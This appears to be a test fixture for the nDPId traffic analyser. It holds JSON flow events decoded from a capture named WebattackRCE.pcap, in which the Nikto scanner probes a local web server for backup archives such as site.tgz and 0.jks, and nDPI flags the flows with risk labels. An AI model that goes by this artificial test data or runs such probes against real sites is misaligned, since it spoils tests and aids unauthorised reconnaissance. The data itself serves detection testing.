00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":1576420277185,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277185,"pkt":"AAAAAAAAAAAAAAAACABFAADACsVAAEAGMXF\/AAABfwAAAcQIH5AHdTJUhgOj64AYAED+tAAAAQEICp1m\/OmdZvzpR0VUIC9zaXRlLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":1576420277186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277186,"pkt":"AAAAAAAAAAAAAAAACABFAADEtSBAAEAGhxF\/AAABfwAAAcQKH5BCRY2PbjuWH4AYAED+uAAAAQEICp1m\/OqdZvzqR0VUIC8xMjcudGFyLmx6bWEgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":1576420277187,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277187,"pkt":"AAAAAAAAAAAAAAAACABFAADEwZ1AAEAGepR\/AAABfwAAAcQMH5B2JfkLbDSLWoAYAED+uAAAAQEICp1m\/OudZvzrR0VUIC8xMjcudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":1576420277189,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277189,"pkt":"AAAAAAAAAAAAAAAACABFAADAxaRAAEAGdpF\/AAABfwAAAcQOH5BgW\/00es\/TMYAYAED+tAAAAQEICp1m\/O2dZvztR0VUIC8xMjcwLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":1576420277190,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277190,"pkt":"AAAAAAAAAAAAAAAACABFAADACFhAAEAGM95\/AAABfwAAAcQQH5AQPjDI+venWYAYAED+tAAAAQEICp1m\/O6dZvzuR0VUIC8xMjcwLmFseiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":1576420277193,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277193,"pkt":"AAAAAAAAAAAAAAAACABFAAC9hYJAAEAGtrZ\/AAABfwAAAcQSH5Cznr0TB99xxoAYAED+sQAAAQEICp1m\/PGdZvzwR0VUIC8wLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":1576420277194,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277194,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JiRAAEAGFhV\/AAABfwAAAcQUH5CXxR6x507sMoAYAED+sQAAAQEICp1m\/PKdZvzyR0VUIC8wLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":1576420277196,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277196,"pkt":"AAAAAAAAAAAAAAAACABFAADASbJAAEAG8oN\/AAABfwAAAcQWH5DgxXEkcLyXoIAYAED+tAAAAQEICp1m\/PSdZvz0R0VUIC8xMjcwLnRneiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":1576420277198,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277198,"pkt":"AAAAAAAAAAAAAAAACABFAADAjLtAAEAGr3p\/AAABfwAAAcQYH5DOSLQrVcLjaIAYAED+tAAAAQEICp1m\/PadZvz2R0VUIC8xMjcwLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":1576420277200,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277200,"pkt":"AAAAAAAAAAAAAAAACABFAADFaNRAAEAG01x\/AAABfwAAAcQaH5BzoVBHI7Wyn4AYAED+uQAAAQEICp1m\/PidZvz4R0VUIC8xMjcuMC4wLjEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":1576420277201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277201,"pkt":"AAAAAAAAAAAAAAAACABFAADFz59AAEAGbJF\/AAABfwAAAcQcH5D4h\/cKGx\/I\/4AYAED+uQAAAQEICp1m\/PmdZvz5R0VUIC8xMjcuMC4wLjEudGd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
